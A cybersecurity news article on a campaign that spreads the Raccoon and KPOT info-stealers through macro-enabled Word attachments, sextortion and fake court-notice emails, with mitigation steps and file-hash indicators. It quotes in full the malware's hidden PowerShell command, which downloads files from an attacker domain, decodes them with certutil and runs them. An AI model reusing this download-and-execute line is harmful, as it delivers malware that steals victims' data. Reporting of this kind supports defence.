Friday, March 29, 2024

Hackers Attack Windows Users with Info-Stealer Malware via Weaponized MS Word Documents

Researchers from X-Force uncovered a malicious campaign with Info-stealer called “Raccoon” and “KPOT” that targets the Windows Users via fake emails to steal sensitive data.

Raccoon malware believed to be originated from the Russian speaking hackers and it has actively attacked financial and government organizations last year with Fallout & RIG Exploit Kits.

Type of Attempts to infect the Windows Users

This malware campaign delivers the payload via email that contains a weaponized document which is signed using the DocuSign software, DocuSign is a company well known for enabling organizations to manage electronic documents.

Info-Stealer

Document subject is referred to as “files” or “paperwork” a tempt victims to open a file, and execute the payload in the victim’s windows machine.

Another sextortion fallout email sample that collected by the researchers has contains the following body content and claim themselves as “the Red Skull hacker crew”:

“Private info belonging to your friend has been stolen”, “Your colleague’s account was compromised” or “We have got access to your friend’s account”.

Also, the attacker sends an intimate picture of his girlfriend and threatened the person to distribute the picture to his complete contact list if the victims not paying the demanded ransom of 500 dollars.

A very recent sample that uncovered by the researchers from IBM X-Force, posing as an official “indictment message” sent by the court. This is supposed to frighten victims into believing that they are actually sued in court for something they do not know of. 

The body of the email urging the victims to examine and print out the documents and also giving a deadline for a response and explaining the consequences if the victims failed to open the malicious document.

Info-Stealer

These are the main attempts of tempting victims to open the attachment to executing the malware payload by the attacker.

Payload

Once open the malicious document, it keeps urging users to click the “Enable content ” that helps them to execute the macro on the Windows machine.

All emails contain exactly the same macro content. as soon as the macros are run, a PowerShell command is executed in the background.

powershell -windowstyle hidden Import-Module BitsTransfer; Start-BitsTransfer -Source http://corp6.site/IeuAje.dat,http://corp6.site/neaJk.dat,http://corp6.site/QpYe.dat -Destination "$env:TEMP\vido.com","$env:TEMP\sfera","$env:TEMP\QpYe.com"; Set-Location -Path "$env:TEMP"; certutil -decode sfera tref;  Start-Process vido.com -ArgumentList tref

The above command will download the Raccoon info stealer hosted on corp6[.]site.

In the recent campaign deliver the KPOT and another info-stealer via new hardcoded URLs.

It is worth mentioning, that we have seen info stealing malware distributed comparably on the domains corp5[.]site, corp6[.]site and now corp7[.]site. Researchers said.

Mitigation

1. Do not click or open links in emails directly, instead type in the main URL in your browser or search the brand/company via your preferred search engine.

2. Ensure anti-virus software and associated files are up to date.

3. Search for existing signs of the indicated IOCs in your environment.

4. Block all URL and IP based IOCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.

5. Keep applications and operating systems running at the current released patch level.

IOC’s

40EB933C1538165C0E777BE5DCB38F91
7DD258C510A6B9EA4FBA30D4AFF0A9D4
B403F98DA4F2E15F9F3B516A589575C5

Website

Latest articles

How to Analyse .NET Malware? – Reverse Engineering Snake Keylogger

Utilizing sandbox analysis for behavioral, network, and process examination provides a foundation for reverse...

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles